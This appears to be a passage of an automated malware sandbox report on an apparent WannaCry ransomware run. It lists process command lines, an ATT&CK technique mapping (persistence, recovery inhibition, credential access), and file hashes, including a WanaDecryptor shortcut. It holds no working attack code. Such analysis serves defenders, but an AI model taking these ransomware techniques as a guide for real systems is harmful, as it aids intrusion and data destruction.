"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f4718
1⤵
PID:2116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
1⤵
PID:5660

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Bootkit

T1067

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

File Deletion

T1107

File Permissions Modification

T1222

Modify Registry

T1112

Hidden Files and Directories

T1158

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\@WanaDecryptor@.exe.lnk
Filesize
1KB

MD5
02464025879fcc9ba73bdda98215dd16

SHA1
297b033cfdfa5f7ea63e6ba0f811e4317957bf23

SHA256
40bb9f6b4542411d8b2c0ec5c75385e38daf354b96f488db27837a206ea0e4b8

SHA512
e1a9741da8998b6b8fffdf6c9f807bcde9a9f3762800e250e047041b3a72397842ddfa91c97727fe027409b306ddaff2f8105e7c22fa9f6c9201359982c367e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
78c7656527762ed2977adf983a6f4766

SHA1
21a66d2eefcb059371f4972694057e4b1f827ce6

SHA256
e1000099751602ae1adcec6f1c74e1d65f472936817b45239dfed4b043984296

SHA512
0a8e58ae95163b3cdf8e81b5085887761e73cb7c836a1a6a972e837fb3df69b2ac70cfd6311d06d40656344ec35eb48e512f007561480f0345486ac2b329be0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
099b4ba2787e99b696fc61528100f83f

SHA1
06e1f8b7391e1d548e49a1022f6ce6e7aa61f292

SHA256
cdb1db488e260ed750edfe1c145850b57ee8ab819d75237a167e673116a33ee8

SHA512
4309375e10785564ceb03e0127ced414e366a5b833f16a60d796471d871b479e4c044db5268902d9dfd14715ca577cb26042bab8f7b0f31fe8abf33947feb9d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
5dfd03b3dd67c8af2b893955484c8135

SHA1
e3ed2f54df118cdfda354d35f2d5e8106ac68f10

SHA256
2452df28ce2af6022512073064da94fbb8005db6e3fc4d07e6cb66a54397fc40

SHA512
fc8ebc547b165360a0c1204c352069c9fb2225038a4e30b31e4a083a45ad959cd4149c1c65e4935404667c7134d497d1b271136ebf194b1963a1fa8940aae58c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\283d7801-ac43-4a97-b1ff-23b06d4d53e0.tmp
Filesize
5KB

MD5
69055a8cb433bdf3f98af9d92bcec85e

SHA1
bf2b7e6d1edf052e1ad5d870b6ff042b8b28d948

SHA256
852344014a6ab5783704c585d2bbfe90b3110a608def9a224ee365229c470e26

SHA512
737c203a49c237be5822d15dc5f8ecff4c425325bf5761fe6429c8f0cdebbeeb8bc35423a714619cc65139a388d200cec7617c4ed568363f5fdd6be9a5c812f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003
Filesize
160KB

MD5
67145d1dd8c7201ad506c8734df41708

SHA1
9f10d87858deb8ee394d47a6268494905ee9f0c0

SHA256
e0ebeeb232953726660519b937e1cadaf1cb2461e8c044044ff2e9a481f085a0

SHA512
cbf26927e90100331eb8cb94bbf4da6ab431e7dc4919ca6068e672cb07b2d938351d502770433707e98bbc506297fa221dced4fbaf3af92d281da7d18f80c95a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\713c71b0f89a67d6_0
Filesize
288B

MD5
dc82ed6ac9f84b83fd9c20b5d1292c03

SHA1
e96c1aecef3637dfd6d335bd282e129fbbcb3ace

SHA256
c9bb9aaf2a3f9ba80143a720da25e4becb889779af3d8f793255d6f3153b58ed

SHA512
723894243dd31a027663b0d6860d5a384c1ff1f86092785afb548679ac2d69ff236dd6943f99fd9bfef388e707f41c1364c3f9804bf6a042ec185014db532a7f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\fa5ab2f1b47efd01_0
Filesize
335KB

MD5
8c65f22bc3f280855ce4d2c9d086364a

SHA1
52eb0c79ed3a7919ec67a90a67d0ad016f6eb2ac

SHA256
7359add898121ec7108e4fae88fdebc21b38e121209233a1b9245355f46c064f

SHA512
68bc9e0ab15a06be947480a7c43567b04b2d8a60f78ad3d69ac85a754120a9a9c6ef49cb517e2584e2d9c5382adbe1db9398d689badfd5c9a20b6abb316dede0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index
Filesize
144B

MD5
ecc0b1959a76b00be5978bb950db1563

SHA1
136ad329879be525cd0af4da7790a3ebc1a9e1d6

SHA256
097eb339a51e24f43805d9a684cbf3913ca6ccc29a92b08b755289ded083d3e1

SHA512
be146c12ca79914801588ce1c5fdb0ac556aacea6632aca1f92a323094a333d1227ad50df86bbebdca16e262e0b6456a05bf03582a0ab2612d59f5d68e895d7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
144B

MD5
a19165d16a990cefac6bfbfc8857a038

SHA1
88e81d0ec13ceb9d8e20dccc2f4c2e3c038e312b

SHA256
13fc5a2d91ecb097866ba0f5c2de0fc735c00bc5490802913a5d5df231601c1b

SHA512
123efe6aaac5dae52dde4ae1082feeb63189c9121b138b2eaf257be1eb52a27e57bc0c1f9229d8858d0e1c6be2a59818b3d987b5f7432222f1de68b691ba1699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
144B

MD5
ef3c4fceafcae8e4a9b50a9bdb44a4e6

SHA1
4f56a7300f8f5075ca6794dde29674b644b41ab8

SHA256
bf06044b750d0f2597e5afa76f4dbb3a97a6dbe8360c9bd54d67f1d232d8006d

SHA512
b2a7d4218cbf5f67ff1249b5dc50073771443ce1efa6bef8b1f8e862d7e0b6b30356130129253fd8e047cc9e851323d25df1a744d80ced6d428468148433d9a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
144B

MD5
808ebcc11076292d278c69a02e4b8c52

SHA1
04072f578bae78b9e4ccac9c38865776b0903a01

SHA256
d11d2adba26efe2556a4448a4182d0126ffb0acde9596eb86d50736e71b94cbb

SHA512
b89a5837b152a579e33361c1df8bcb772761935ae8de53f48a964c7458fd97a1e68662f4b3b183c92ae2431b4a23b085df7158fe9952f814df5b6b936873ce16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
144B

MD5
1e3938ea7cc86fcdb9b3e71fcf8e78ae

SHA1
8cb5fb5cb37a5bdd684a0721b012630ccc1fdb6a

SHA256
d6b6ddd17783375eb03fbf327dc187528162ed949c5386b7af055a65ec5f15de

SHA512
bd6c9f426f9300fe7f60df4ccd39ec39bc0386e3057eab0d6f8a05c1d6f1366f90d7a4e83bcc9bc099575020cadbe8c0709963d8a32e9a96aaa08fd47f67934a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
792B

MD5
efc47cb48bac4ef5c7447cf23238dfc0

SHA1
06d73f755b4e148e18ed661b37dbb2c45494d49a

SHA256
5d39675e6204cffe8cfe460087e270c9dc9176c1c5056d5da49e2751bebf35f1

SHA512
50279495d924071032ea5dca52d32c2c05c9dd7f1e6034e51d805b00a60cf7fc461abc8c0d2fc70b4e1d3f6965298a639f5f3b2401f1587d4fdff635a67c1404

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
144B

MD5
2e5e80cd46533428375128d45c2e1d03

SHA1
ebba43c6022e120be555335c45537de690b08dde

SHA256
a7eb28213895472d747a0af878b9ffe9dfd6523e81b5303fab6b1f77a1d8549a

SHA512
3e2b75cdffa259d2323f38c3bde4b5c049354851c389b428cac83ea0f08a8402322f0b7e7a8e1ba3876ec5054d9cb8581dde77d044a13f0d659f43ac1ebc21b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
144B

MD5
d403c9abd247843858661f83e8e2b675

SHA1
1204bc53623de0cdef0fdf66f625cf49e565b4eb

SHA256
a490a1ca6901ea370bb512d757882a26762359aac13e828b8a90d5031f525df6

SHA512
7643b2ca65f2e164128f461385cfaa02962b89701ac0ee7e2a8d442daf6936b32a4e1c979e66ea04b6beba761c9470f9f02f25856f01379d467e381660e8d2e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
48B

MD5
e202f7cb9fca62476e95af326290c085

SHA1
c4ef8b40e833d30b49b307ff383c0f879015ea5a

SHA256
ac80dbff04dcbe9e7a0d6daa8f62dbeedda34cc079b21502df22a3706338dc7a

SHA512
4f95e4179f6e19d2911949ee863ec20056449c0bae369c7725514b1377344382685e3974fe861ced2a33e36af29da048671452729563c478ae7c409d173ab6a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
1KB

MD5
e953b4b7c8bb4414572744e7900c8f4c

SHA1
1207ed2fdf0e0e84a025c6acbe20d6f4a9ea3655

SHA256
74b267038f0c60d641379a4ce955a963ab4f1475c80e38dc9517704570f3ff01

SHA512
10926b64e5c29681a8641686dfe380b5d2d84bfa5b7b1c2d0a6ea51281ce0a8f9c0fc07a7a480fdb1fa358eaacc485b4f1edc0be859e14e1bcc7b7f94b6ec565

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
144B

MD5
308bf5b8c3b329938781cdece631de60

SHA1
11712e947c7bbae8190f8c799441d0017e02971a

SHA256
af8777e44c345ae7c414eb8e5d242b704bbe97a8aaab7ef4fcd8d778c553e492

SHA512
5eb78db95e60a3c2737117e0ac7cb815ab417fafd1e268e09bab2686a431259991839d917c47f25c8a05f9d9d377d3cdeb1f40432602166c407d7dd0541db2eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
120B

MD5
cdfb131ca3de8803981629f42ebaa836

SHA1
9e7a07e9323f0f8be4f83977c0418d872205e10d

SHA256
9248c8688a330353130c0dc41eea91d6b7a3ba1b33ce36b0e1b70af99a6019e4

SHA512
06ff8de0273c7591d4fbeb0f1a409f22c643840255ccebebd0593dba19c538817731fac135912fe4bfe5b397814db7f4be5203e7ee85e3fde23ba5e0fc38f083

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk
Filesize
2KB

MD5
8d5f0f6ef1cee51c7e2da6eac013f747

SHA1
a4a36e277cd2d18c71c55df7c00b97314ce4589c

SHA256
9babeb59b206a584ceb2cc0f6d8bf36cfccb6a352de6a6fdfa215688fbf38592

SHA512
3297a8a6577b87950902bbd466e8100abbb3a773fa2fd3e90150052e874088cd1ae606918ac204f5c2ee8b329b01dbd985337c969368496fc308af25b8c820b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
816B

MD5
bf8ba97b9bbf07d0407230b2322d063a

SHA1
7b2ddb52f57c001b6b8fb96084f1c6693599a66b

SHA256
04f5fe3aac9aaf725ec493f80ab0d94e9f1aaf5ba208da992465101610562655

SHA512
cf2393e590c1699dd2624f210609fbfa345bd2858d006e157c29137ba41f196d5948efaa17c9c04152bef8f4d05ecd62153e7665e46489a823a493e25155efb3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
8KB

MD5
df17d9d4d107c32d1e7bdee25e4fa65c

SHA1
a1b861dc212a215a2b783582ffa51b4249c91f3a

SHA256
0fd545f97e8aefb66aaf7b02ab0dfe7c8c44e5da9b2256b1c2b51e146ccbcfb8

SHA512
79e5e3c9d8f7e90be08d621883fd994723f4ab1d78bb067ab7182f76a8a5adf5920c25daa4664bbb01def74316e7041fce69cde2f4ef58f6a7519d77931bdf1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
816B

MD5
522a50c94af49faefa9129bbd2c1f5be

SHA1
a23035143ceb1afa879661e40f9b5510ca53e414

SHA256
96eec23fb4ed1d6f65b24f47e217dd41b472778ea6d2cea761eb37a5a0c210cc

SHA512
6c5e4951012dc954580556c9d7357afcbf6834856bfe2384967a38c55ec5b33013d74d111f10153f463b4c19a3331b4ca049eece6503e6eb91239eff37b0e9d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
816B

MD5
b8874b85e486ac443f2b4816f163b822

SHA1
1457843c17a86828e5a4b6a900e08a533a4e384a

SHA256
c203bb68c6b2e77fc9105a2276882b74a7f4d0190fcf6cd0b9b884bc8d2f714c

SHA512
0fc4326c03ceda2c3357e12b1a2e43b6f32172cc7a7c3b37074a2f0216f91d6900041fd018b27ecab8b324bf25a6c207ea50a5ae4045c9e684a9abe18cbcc839

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
69e17f1ba193a5704ff34f522ea6ec56

SHA1
196afad3ba6eee4ed8b5b2be06d30eee2d9c6a2b

SHA256
24d0745c01911e8103695bf9602102367a75b17cea196623e0df933407398e5e

SHA512
c34622f370e9b58a0ba088e0291ef733b7afbd75ef9b637803be061f5ae4ce65e76b203d67ac2b86b0a84b2133cfad46cba5df076d8780a21a3cd8b609cb6b4b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
7885b33d66d2b157b2db32114263d24b

SHA1
614a825170b48a509d138dfb19cd91acecf2047a

SHA256
4f8ad81f8417bb8fe906960afaf9da0611b4649fed563b58542ef074c31ef351

SHA512
935886013afd49ae2160252f45644f5f69e2ec7dbb66e0bddb5020f355f5aeec87d65e72f823003673ae411db0ef9db3e834a4f5e428dae86e9b5685593f26ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
47dcb5a2556edf9c74689f18adb033e3

SHA1
3269a7d0e9c68cd999d0cba8a1c5ac7e45768c3d

SHA256
253eef2b938ebc56586ef0df74f972626d9adaf61440ef55289901569520d4d6

SHA512
f0271f01a1205482344354c2d3b3489e08987bf0d450d3dc0e10e0dfb64cd94eea7680ed4a79fdcb2c0ba35158c4b1f4998db248158e0dd5285ccba3f80ead4a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
30a264e6a3d22178bd36da586ffb0fae

SHA1
fcf2080e2ed2bcce6cc6d9aae2153c41c8203899

SHA256
e4b9197aa64ed73117df465582fcc30132c050c3e4a036d7f8e8ef3baf5bf218

SHA512
1e3c8ae059f6ad6bc06f22747d5362dd05c6c090741fba121b6e615b1302c52f74d1d578814d6e48515ec12dc6ff1c6be79f4e4ef6a0bb37560bca25be9e3706

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
11KB

MD5
ab9fb6d0d62ca937d635a1593cf8cb30

SHA1
c74c7504e06c975eb99007b6dbc0461f4afdd2f7

SHA256
7dc22ee076434ccd3741454859734f71c86978c82c69be2f75140c533cfe8034

SHA512
04bb0fce70604e01f8b2c1bd86f778f7192cc1a5d5e20a4848fde5eab6b007c7cda5e310febfaf890cef932b8a37115b6475bbae880a6852f5609f0ea8566aa9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
15KB

MD5
79431c76152fd341648578b10226bdf1

SHA1
496c584cc997a10c876c9a6cf0e47e3dd04fc07a

SHA256
280911eb97bdc9f5bde5d44951c73212bc6ca0a6ebc1bd2f7b051cadce034e2a

SHA512
da15242fdd07e7009fa199c6f3b9cd4a3f3baa76b035f050ab32fd1da407089f13fb4e35c7132844830c18e6ce54825f89f58b87890bc81bc749836b8f962da3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
b0212785e56dcaab8e7ec1f9d8999bef

SHA1
5cb9bd8bb2070218aa59516a809280cf24132680

SHA256
3dda37a77bcaf98e4e4631f4db7885e7cbc49a3fbc71dbab5a6d6193242401c8

SHA512
29b9685b0e4e97ee1240d7c298238461cbdeb921ad1331f24d49c4d4fdef0e36913bb14bdfc9414dc4b0fb752ea77063e7704f06027a85e78f4f4b7b5c3a9498

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
8d0614a9ad75f13e6af90a4aaadeac2c

SHA1
dd28dbed09c5cc235f541baa0a1b228bc0fd698a

SHA256
e651e6a91aaf18b6ee8abb85bbd11d112dcc244dff4939f1b6e8a134703eba15

SHA512
3f8a79556ff5b90ec03faf5fe55ddacbb4d49bc74211a2b987709cb3c23a1f2198fcecaf34e23c5a35efa04fdeba537fe9758062e165f50ad0189c7e383a6134

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
011dffb0bf3320c3e4a9145e9382263a

SHA1
2d94462b98fef6f35a420775485615a2fbbb118d

SHA256
6c3231509ecefb878e55a77641c53ea3cdfe92e3c393c9703858d45642db3b03

SHA512
70c94e1b5b38cc3b641551820a527ef728154600e2dd0a5d2da9a7b4b1b648d57dab83d8c9159852ab8221d5990a91952285a0d83461ba3ead58c0b8f16a74dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
7784581d841affce96267dd6a063687f

SHA1
5dac01b7d4d6273cdd9ad93cc70ac0da6212914b

SHA256
31ad0d0afc5985c443bb740dc89251b3bffe2312f3ec068bf1f3e8efd2fb70ed

SHA512
c93e4a4f120ede8f64a8284eb833ba1a13877457f1ebcacbb5b849890c2756a0880bb2037a45e799c7dac65cffb7bf747ce9bc7bc81745abf1eef0114e3ced6d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
aaa01c06282bf43eb5bb9626c24a7193

SHA1
3def3cc27bd6d2b7b9b09249da98905665b63118

SHA256
a17cb0081db5ab6c622152c213fe9aa038535b99c728d335c1c71bf9927918b7

SHA512
8f57d1358cb2d0e47c8a30f3b88e962185c5a32f79c15f8578e9c48f33276e0b6382bfa979f53c0e84e4f61b7efc05d14e66e3b31653fae674414bc41442d21f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
ee12864f6f7cb6adde30b5366740e356

SHA1
07a55c5f3b6a75abed36e4eb634a6f8869cec1da

SHA256
46fa09b089d257fb94ce3f4b4884d9df489f96ca7746dbabfeb2c45834c81ee6

SHA512
4b67b6d2b5d5250b4d8f7877cfc9587eb1c940cc4c5d1305d4018979beafaa302af997245f23ddda169d1370601f95934b78a194c00d96bd53f90c1cfd1e5edf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
e497d360c16bac73508ff8f0f75e23e3

SHA1
afb5b3141c2bac335028cae766dc973e7d5eb6a3

SHA256
349ab0ed8295d970163510b7cc9ecc4bb60fbe65881526d3ed0e15c398d4f973

SHA512
8b8312001bd11ad1722f57c53e280fc80c4602008df8c9afd6dfeb5446c4b1e8be240c2f7134e8c753771d1fcd252bf6a0ad3fccea7622f7ee630a431d1741c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
136a7b1f6e5c4950da6948c6c09a0b98

SHA1
2b97896f4fb8ffe287760d43c727c113514bb62f

SHA256
fbaaf28980810e03cec86328269bbbfe46aa96c91d081809ff96399776755951

SHA512
1601c653791529fdf7246db89cbb29d02368dd1067cb976d051417bc64fa4b2daac3892fe12eff513f8ae2de972dad0ce9ed7c3374b5b25a5348c6378a10909d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
15KB

MD5
b4a66fd996f5fee3467472c55ce669ff

SHA1
b7485cf19026bb42a333469cde9707a4e449d1e0

SHA256
46c2be262ed9f79240ec58d5280287d2ffef2dcc3955587ed335cb46c5571cbc

SHA512
72ef3d93fba2b9dc1429e2d466d5ee04ee0accfe05b824e521bea94d2a7e777137f908940b6f222c6d446170906635a47276b1326bdd942ce1b6c7fd5764e5bf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
15KB

MD5
16d5c7a649a4895def92d3c31e45c164

SHA1
f41d305c97d32ca7ff27342cb1425907cc734424

SHA256
48733a2f1093f3a338d8d20fdf696896fbe64fe7949c934c528dc3add9bdf338

SHA512
b7946361de7c83691d3ed7b25d8a5e154b0674699932997c4ee39a45712589c416dc9104fe29cd7c757007b6b473946c576a17135f94f0ae15b5a7d48228a539

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
566c65f775c07f9cc002ad834304e1da

SHA1
c87f29396fb8a766774f9374df6f26b7fcbfbb5f

SHA256
8b9d5ce75e6a755436acc78d8f71de4e38c3a94dc5d004963b93cb89a773c3c1

SHA512
839ad8967c962b930841aae5061aa8ab10b78ffdc6c89645d28b0e94dcf56b02acc469ed6bbd3aeb985a9a5f64488c40ad2792fbd37930358b31e13da5022974

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
4KB

MD5
aa48e4672dfcc8ecf17c30c7c193b295

SHA1
434cd7671251e33b8826fc7c7bc1a636217051bf

SHA256
94f203db72e85525fc7fe709ab8e308c9843f052ae9a0694d2828443bf365907

SHA512
0d8658bf85e71d56289c4c9d06e473df345ee69fc6f8cc232d39a08fd41341b380ab42ec30aeb9402950f6d900daff900258849067aecb1677817e90a3b618de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
15KB

MD5
b0e429d8b90b05838bd7328ea60aed3f

SHA1
468b5a77c504eeafd43fe0afef31d418be936437

SHA256
a2a931bd7e40331b1e29957a15a802d02b0ea7ab35ae72158744c41ab8447f07

SHA512
4b9a6b5248fd45906878d1416cd648b0949adc343f99012b6e9bd2961d0d28a0416515bbc73caaf0f47f77ed1c4ed679709bfe30b34e845f6ab6c86e9695dfb9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
9e3b2ad473b35e6b43d1120196ac4708

SHA1
2d4d564d127b460ab9d31b338d47059a051ca147

SHA256
edaad8e36b5abab01ed80efafee3d416c8f9e124725ca343ea1bce907c9194fa

SHA512
4164bcb5763cabf5cff7b058a3850254e483135abc677433af1dd24e197a99efc2cc3b2131e9ee9a0295a45f48d617a109432d99ed994330822c30dd803a0348

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
d5e5f40d42a728a9a31a0a2cd3956e18

SHA1
6ff96c4fbb47d5eadd6fe74d42d5aae0d83decae

SHA256
efc62f4b8ff9dde615f4eda2cb78c92246d1d502f7c1b293e2b3ddca574ca23b

SHA512
3b85e9720421fa95d7c8ef9bb4ade6375f3e2d1eb3a4cc403452289ccc25d9f1bbd4dc9698b1f50cb28cc47c3d92b30199252985658f5daf46053de7addf9d26

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
15KB

MD5
dbc9d715829075737e940adfc43cb379

SHA1
2890aee66fd73f5623dc6d6b3b0beac3dc506e32

SHA256
1f394edfa2e2cd4c4611af1b2e78e2b5abfc23b3a86d5f632637f02496623108

SHA512
9d3dc29347685e68df513f925cce7698a3eb6ae6b1d65c020733ff61072673dbc6800b182a16a93e3c64da22e6cd0d43e9c72b3801426cb80b70a98ad235b742

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
Filesize
24KB

MD5
02ee7addc9e8a2d07af55556ebf0ff5c

SHA1
020161bb64ecb7c6e6886ccc055908984dc651d8

SHA256
552d3ed359b7a52278ce621674d16428d8a7969f6cd5663df18e240cce66aadc

SHA512
567989543c3848a0c3276d96b96ca761f750e4b71fb74f36d809f590ffe16a72fd5ece251737a8b1ffe65f0051e211bd7ad19d2b8b0b7ca1b7ffc86dd2a52883

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
5KB

MD5
756293a3de74adea6a36231c712c28b8

SHA1
0e4abbb22db6551bb299071f1c1bd025a2141e33

SHA256
a6c54e1352651a00f2b3ee398e20a90b49546a878754ac495dc004053d3f28a5

SHA512
42ff7f1c17d0009c8d0a589af4cca1cf3c0ede37006cde1d42ac3fe975ac77d474b0da90712ec58d0980a1584eafebcdde339cca3f80b67dd17c2ebb1c7a31f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
6KB

MD5
339ceb1f550bece6ae208b3e263a06cf

SHA1
c6bc9b17628a1c9383cea8cff51122a11135eebe

SHA256
64e4c68eb6a354b576bec874cf12d2a7bbd5b5adb09e8d0e67542a45d069a32e

SHA512
b525d9a0d7325315bbb9bd839ec3c7ffb8b4284c7b6fcf0579582322eaec4f5bb77dcd3c8dfa7a90f416d3044cf3a3fd0d12583b79bdcd3df9dd63742c441290

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001
Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
13KB

MD5
be46fcf15bba7334ecdbcfb733635f79

SHA1
95da809acc6037bd0c53fe152f1e9cbd15475944

SHA256
